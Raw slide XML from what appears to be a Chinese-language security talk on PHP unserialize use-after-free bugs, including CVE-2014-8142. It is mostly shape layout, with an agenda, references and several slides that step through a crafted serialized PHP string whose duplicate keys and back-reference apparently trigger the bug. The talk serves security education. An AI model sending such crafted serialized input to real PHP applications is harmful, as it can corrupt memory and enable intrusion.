          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5270" y="1360"/>
              <a:ext cx="1132" cy="176"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="20638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8"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5192" y="1490"/>
              <a:ext cx="96" cy="89"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 96 w 96"/>
                <a:gd name="T1" fmla="*/ 89 h 89"/>
                <a:gd name="T2" fmla="*/ 0 w 96"/>
                <a:gd name="T3" fmla="*/ 58 h 89"/>
                <a:gd name="T4" fmla="*/ 82 w 96"/>
                <a:gd name="T5" fmla="*/ 0 h 89"/>
                <a:gd name="T6" fmla="*/ 96 w 96"/>
                <a:gd name="T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89">
                  <a:moveTo>
                    <a:pt x="96" y="89"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="89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Line 49"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="5884" y="1535"/>
              <a:ext cx="554" cy="166"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="20638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auto">
            <a:xfrm>
              <a:off x="5808" y="1654"/>
              <a:ext cx="99" cy="87"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 99 w 99"/>
                <a:gd name="T1" fmla="*/ 87 h 87"/>
                <a:gd name="T2" fmla="*/ 0 w 99"/>
                <a:gd name="T3" fmla="*/ 69 h 87"/>
                <a:gd name="T4" fmla="*/ 73 w 99"/>
                <a:gd name="T5" fmla="*/ 0 h 87"/>
                <a:gd name="T6" fmla="*/ 99 w 99"/>
                <a:gd name="T7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87">
                  <a:moveTo>
                    <a:pt x="99" y="87"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="69"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99" y="87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1439" y="2015"/>
              <a:ext cx="906" cy="181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1439" y="2015"/>
              <a:ext cx="906" cy="181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2345" y="2015"/>
              <a:ext cx="905" cy="181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2345" y="2015"/>
              <a:ext cx="905" cy="181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1439" y="2196"/>
              <a:ext cx="906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1439" y="2196"/>
              <a:ext cx="906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1439" y="2378"/>
              <a:ext cx="906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1439" y="2378"/>
              <a:ext cx="906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Rectangle 59"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1439" y="2560"/>
              <a:ext cx="906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1439" y="2560"/>
              <a:ext cx="906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Rectangle 61"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1439" y="2742"/>
              <a:ext cx="906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Rectangle 62"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1439" y="2742"/>
              <a:ext cx="906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2345" y="2196"/>
              <a:ext cx="905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Rectangle 64"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2345" y="2196"/>
              <a:ext cx="905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Rectangle 65"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2345" y="2378"/>
              <a:ext cx="905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Rectangle 66"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2345" y="2378"/>
              <a:ext cx="905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Rectangle 67"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2345" y="2560"/>
              <a:ext cx="905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Rectangle 68"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2345" y="2560"/>
              <a:ext cx="905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Rectangle 69"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2345" y="2742"/>
              <a:ext cx="905" cy="182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2345" y="2742"/>
              <a:ext cx="905" cy="182"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4A80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71"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1620" y="1307"/>
              <a:ext cx="1449" cy="635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1449 w 1449"/>
                <a:gd name="T1" fmla="*/ 380 h 635"/>
                <a:gd name="T2" fmla="*/ 1449 w 1449"/>
                <a:gd name="T3" fmla="*/ 0 h 635"/>
                <a:gd name="T4" fmla="*/ 0 w 1449"/>
                <a:gd name="T5" fmla="*/ 0 h 635"/>
                <a:gd name="T6" fmla="*/ 0 w 1449"/>
                <a:gd name="T7" fmla="*/ 380 h 635"/>
                <a:gd name="T8" fmla="*/ 543 w 1449"/>
                <a:gd name="T9" fmla="*/ 380 h 635"/>
                <a:gd name="T10" fmla="*/ 725 w 1449"/>
                <a:gd name="T11" fmla="*/ 635 h 635"/>
                <a:gd name="T12" fmla="*/ 906 w 1449"/>
                <a:gd name="T13" fmla="*/ 380 h 635"/>
                <a:gd name="T14" fmla="*/ 1449 w 1449"/>
                <a:gd name="T15" fmla="*/ 380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49" h="635">
                  <a:moveTo>
                    <a:pt x="1449" y="380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1449" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1449" y="380"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:cu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2"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1620" y="1307"/>
              <a:ext cx="1449" cy="635"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1449 w 1449"/>
                <a:gd name="T1" fmla="*/ 380 h 635"/>
                <a:gd name="T2" fmla="*/ 1449 w 1449"/>
                <a:gd name="T3" fmla="*/ 0 h 635"/>
                <a:gd name="T4" fmla="*/ 0 w 1449"/>
                <a:gd name="T5" fmla="*/ 0 h 635"/>
                <a:gd name="T6" fmla="*/ 0 w 1449"/>
                <a:gd name="T7" fmla="*/ 380 h 635"/>
                <a:gd name="T8" fmla="*/ 543 w 1449"/>
                <a:gd name="T9" fmla="*/ 380 h 635"/>
                <a:gd name="T10" fmla="*/ 725 w 1449"/>
                <a:gd name="T11" fmla="*/ 635 h 635"/>
                <a:gd name="T12" fmla="*/ 906 w 1449"/>
                <a:gd name="T13" fmla="*/ 380 h 635"/>
                <a:gd name="T14" fmla="*/ 1449 w 1449"/>
                <a:gd name="T15" fmla="*/ 380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49" h="635">
                  <a:moveTo>
                    <a:pt x="1449" y="380"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1449" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="725" y="635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="906" y="380"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1449" y="380"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="20638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Rectangle 73"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2107" y="1350"/>
              <a:ext cx="604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900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="4F88BB"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>array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Line 74"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="2770" y="1760"/>
              <a:ext cx="1132" cy="176"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="20638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75"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2692" y="1890"/>
              <a:ext cx="96" cy="89"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 96 w 96"/>
                <a:gd name="T1" fmla="*/ 89 h 89"/>
                <a:gd name="T2" fmla="*/ 0 w 96"/>
                <a:gd name="T3" fmla="*/ 58 h 89"/>
                <a:gd name="T4" fmla="*/ 82 w 96"/>
                <a:gd name="T5" fmla="*/ 0 h 89"/>
                <a:gd name="T6" fmla="*/ 96 w 96"/>
                <a:gd name="T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89">
                  <a:moveTo>
                    <a:pt x="96" y="89"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="58"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96" y="89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BC07-29CF-4B94-A234-BD8CCB499D20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193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970" y="1715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O:8:"stdClass":3:{s:3:"aaa";a:5:{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:0;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}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881" y="817897"/>
            <a:ext cx="9953768" cy="3856652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383F-4F87-430F-9B3C-A6E5ED5E27DA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42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970" y="1715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O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:2;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}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984" y="817897"/>
            <a:ext cx="9935664" cy="3849637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14C7-DEEF-40A7-9893-59BA5358C86F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206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970" y="1715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O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:2;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:10:"AAAAAAAAAA";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}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335" y="817897"/>
            <a:ext cx="9935665" cy="3849637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A903-1EAE-43A1-9AD2-FEF7C4A590BC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067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970" y="1715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O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:3;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:4;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>i:4;i:5;}s:3:"aaa";i:1;s:3:"ccc";R:5;}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="92" name="图片 9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528" y="817897"/>
            <a:ext cx="9926472" cy="3846075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772-7D27-4480-850A-B5008546511B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874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970" y="1715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O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:4;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:5;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>}s:3:"aaa";i:1;s:3:"ccc";R:5;}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528" y="817897"/>
            <a:ext cx="9926472" cy="3937288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3C68-10AE-4FB8-94C9-4DC078A2E037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970" y="1715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O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:"aaa";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>i:1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>s:3:"ccc";R:5;}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528" y="817897"/>
            <a:ext cx="9926472" cy="3937288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BE44-05C6-4943-B757-AF176DCB9793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714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970" y="1715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O:8:"stdClass":3:{s:3:"aaa";a:5:{i:0;i:1;i:1;i:2;i:2;s:10:"AAAAAAAAAA";i:3;i:4;i:4;i:5;}s:3:"aaa";i:1;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s:3:"ccc";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>R:5;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>}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528" y="817897"/>
            <a:ext cx="9926472" cy="3937287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4F3A-991A-4853-8480-853304710F22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5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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞类型分类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Web —— PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>对象注入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Binary —— use after free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D8C8-F86E-4BED-8462-3CC3DDFDB339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76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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>简介</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>2. PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>序列化反序列化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞类型分类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> UAF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>漏洞历史</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>5. CVE-2014-8142 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Exp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>参考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D831-017B-470D-8F87-7B3150E07F1C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55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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1" smtClean="0"/>
              <a:t>Unserialize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>UAF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>历史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053737" y="1690688"/>
            <a:ext cx="100845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http://www.cvedetails.com/cve/CVE-2010-2225/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Stefan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Esser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>can 2010</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> EXP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>公布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dirty="0" smtClean="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>://www.cvedetails.com/cve/CVE-2014-8142</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Michaud EXP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>未公布</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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http://www.cvedetails.com/cve/CVE-2015-0231</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/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Tim Michaud</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-019.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-020.md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Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>github.com/80vul/phpcodz/blob/master/research/pch-021.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/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Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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 smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>://github.com/80vul/phpcodz/blob/master/research/pch-022.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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 smtClean="0"/>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>://github.com/80vul/phpcodz/blob/master/research/pch-025.md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Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-026.md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Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-027.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-028.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ryat</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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https://github.com/80vul/phpcodz/blob/master/research/pch-029.</a:t>
            </a:r>
            <a:r>
